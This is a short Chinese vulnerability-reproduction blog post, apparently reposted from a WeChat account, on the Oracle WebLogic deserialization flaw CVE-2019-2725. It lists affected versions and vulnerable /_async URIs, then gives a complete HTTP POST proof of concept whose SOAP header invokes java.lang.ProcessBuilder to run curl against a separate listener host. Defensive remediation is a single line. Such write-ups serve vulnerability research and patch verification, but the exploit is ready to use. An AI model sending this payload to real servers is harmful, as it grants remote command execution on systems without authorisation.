【漏洞复现】Weblogic 反序列化漏洞（CVE-2019-2725）

2024年4月24日07:28:05评论6 views字数 1435阅读4分47秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

Oracle WebLogic Server 是一个统一的可扩展平台，专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。

漏洞参考：

【漏洞复现】Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

官网：

https://www.oracle.com/

漏洞编号：

CVE-2019-2725

影响范围：

Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

复现环境：

Oracle WebLogic Server 10.3.6.0

0X02 漏洞复现

访问目录如果存在，可能存在漏洞。

http://192.168.245.134:7001/_async/AsyncResponseService

默认受影响的uri：

/_async/AsyncResponseService/_async/AsyncResponseServiceJms/_async/AsyncResponseServiceHttps

POC：

POST /_async/AsyncResponseService HTTP/1.1Host: 192.168.245.134:7001Upgrade-Insecure-Requests: 1content-type: text/xmlContent-Length: 707<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="2"><void index="0"><string>curl</string></void><void index="1"><string>http://192.168.245.129:9999/123</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

0X03 修复建议

更新至最新版！

0X04

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】Weblogic 反序列化漏洞（CVE-2019-2725）

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】Weblogic 反序列化漏洞（CVE-2019-2725）

人工智能技术或将成为威胁攻击者的新助力

网络安全应急响应技术实战指南读书笔记之数据泄露安全应急响应完结

通过FUZZ技术获取万元赏金

输入自己喜欢的音乐风格就可以让AI生成一段音乐？Suno音乐大模型初体验

重磅|全国人大常委会专题讲座《人工智能与智能计算的发展》（全文）

生成式人工智能的发展趋势与应用场景

【网络安全】构建安全高效的全球供应链：策略、挑战与未来方向

读书笔记之勒索病毒安全应急响应

漏洞挖掘之众测厂商第三方登录RedirectUrl劫持漏洞

煮酒言规 | 第119期 | 调用大模型对客要备案吗

发表评论

在线咨询

微信